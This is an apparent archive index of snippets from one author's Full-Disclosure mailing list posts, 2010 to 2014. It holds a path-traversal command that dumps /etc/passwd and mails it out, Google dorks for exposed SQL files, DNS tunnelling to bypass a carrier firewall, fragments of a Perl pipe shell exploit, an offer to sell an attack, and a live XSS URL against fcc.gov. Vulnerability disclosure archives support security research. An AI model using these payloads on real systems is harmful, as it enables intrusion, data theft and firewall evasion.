[Full-disclosure] Sex links fail

2014-01-13 Thread Marshall Whittaker
links xxx.xx.xxx/../../../../../../etc/passwd -dump|mail -s HOPE userz full-disclosure@lists.grok.org.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by

[Full-disclosure] Google Numbers Search

2012-10-22 Thread Marshall Whittaker
So... Google really does let you search for any number... http://www.google.com/#q=1..9+filetype:sql :( http://www.google.com/#q=10e7..10e8+filetype:sql :) ___ Full-Disclosure - We believe in it. Charter:

[Full-disclosure] Google Blacklisted Database Query

2012-07-27 Thread Marshall Whittaker
Google has totally 'blacklisted' queries. For example, if you search for 4000..4999 (any 16 digit number starting with 4), as well as some other little known strings, you will instantly get an error message from Google talking about bad traffic from your network (it looks

[Full-disclosure] Disclosures on YouTube (Onaquad Systems Security)

2011-10-17 Thread Marshall Whittaker
List, I'll now be putting up my disclosures on YouTube a day or two before on full-disclosure. You can visit them here: http://www.youtube.com/user/onaquad under the title Onaquad Security. Hope you enjoy! I'll probably start posting the src of the code I use there here too. There is already

[Full-disclosure] perl pipe shell exploit

2011-10-15 Thread Marshall Whittaker
This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it

[Full-disclosure] perl pipe exploit (drops you at a shell)

2011-10-15 Thread Marshall Whittaker
This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it

Re: [Full-disclosure] perl pipe exploit (drops you at a shell)

2011-10-15 Thread Marshall Whittaker
Well shit. It did send twice. :( Now I look like a goof, haha. On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker marshallwhitta...@gmail.com wrote: This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll

[Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread Marshall Whittaker
I recently noticed that you can tunnel TCP through DNS (I used iodine) to penetrate Verizon Wireless' firewall. You can connect, and if you can hold the connection long enough to make a DNS tunnel, then the connection stays up, then use SSH -D to create a proxy server for your traffic. Bottom

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread Marshall Whittaker
with, and abused so infrequently, that it's left alone. On Fri, Oct 7, 2011 at 3:32 AM, Marshall Whittaker marshallwhitta...@gmail.com wrote: I recently noticed that you can tunnel TCP through DNS (I used iodine) to penetrate Verizon Wireless' firewall. You can connect, and if you can hold

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread Marshall Whittaker
not (well, it MIGHT take us somewhere good). It's not like there's a magic off switch that makes this go away. On Fri, Oct 7, 2011 at 4:56 AM, Marshall Whittaker marshallwhitta...@gmail.com wrote: Yes, I've found that DNS tunneling works well at the college I go to on their WIFI. I've never

[Full-disclosure] New attack vector for sale, firewall bypass

2011-06-07 Thread Marshall Whittaker
Hello, I am willing to sell a new attack vector I have devised. The proof of concept code you will receive has the ability to arbitrarily upload files to a webserver (tested on Apache), running linux with the well known perl read pipe vulnerability in many web CGI applications. This issue can

Re: [Full-disclosure] New attack vector for sale, firewall bypass

2011-06-07 Thread Marshall Whittaker
, Marshall Whittaker marshallwhitta...@gmail.com wrote: Hello, I am willing to sell a new attack vector I have devised. The proof of concept code you will receive has the ability to arbitrarily upload files to a webserver (tested on Apache), running linux with the well known perl read

[Full-disclosure] iOffice 0.1 command execution vulnerability

2010-07-16 Thread Marshall Whittaker
iOffice 0.1 is vulnerable because it does not sanitize user input. It seems to be modular because none of the scripts are exactly the same on ones I've run across, but they all seem to be vulnerable. Command execution is possible.

[Full-disclosure] Google auto redirect

2010-07-13 Thread Marshall Whittaker
I don't really consider this a vulnerability, but it's funny. http://www.google.com/search?q=%79%61%68%6F%6Fie=ISO-8859-1source=hphl=enbtnI=I%26%2339;%69%6D%2B%46%65%65%6C%69%6E%67%2B%4C%75%63%6B%79 -- oxagast ___ Full-Disclosure - We believe in it.

Re: [Full-disclosure] (Almost) Universal perl CGI exploitation

2010-06-21 Thread Marshall Whittaker
); unlink(getfile.sh); $exploitable = 1; } } } system(rm gettmp getfile.sh); } if ($exploitable == 0) { print Sorry, not exploitable...\n; } --- code --- On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker

[Full-disclosure] (Almost) Universal perl CGI exploitation

2010-06-20 Thread Marshall Whittaker
This works on the perl pipe bug. It'll take an arg that's the address of a website and it's cgi script with some args to the script then figure out if it can exploit it and how. It's worked on everything I've tried it on, though I have limited test boxes. It's pretty dirty but it works.

[Full-disclosure] fcc.gov XSS

2010-05-24 Thread Marshall Whittaker
FCC.gov XSS --- CODE --- http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E --- CODE --- --oxagast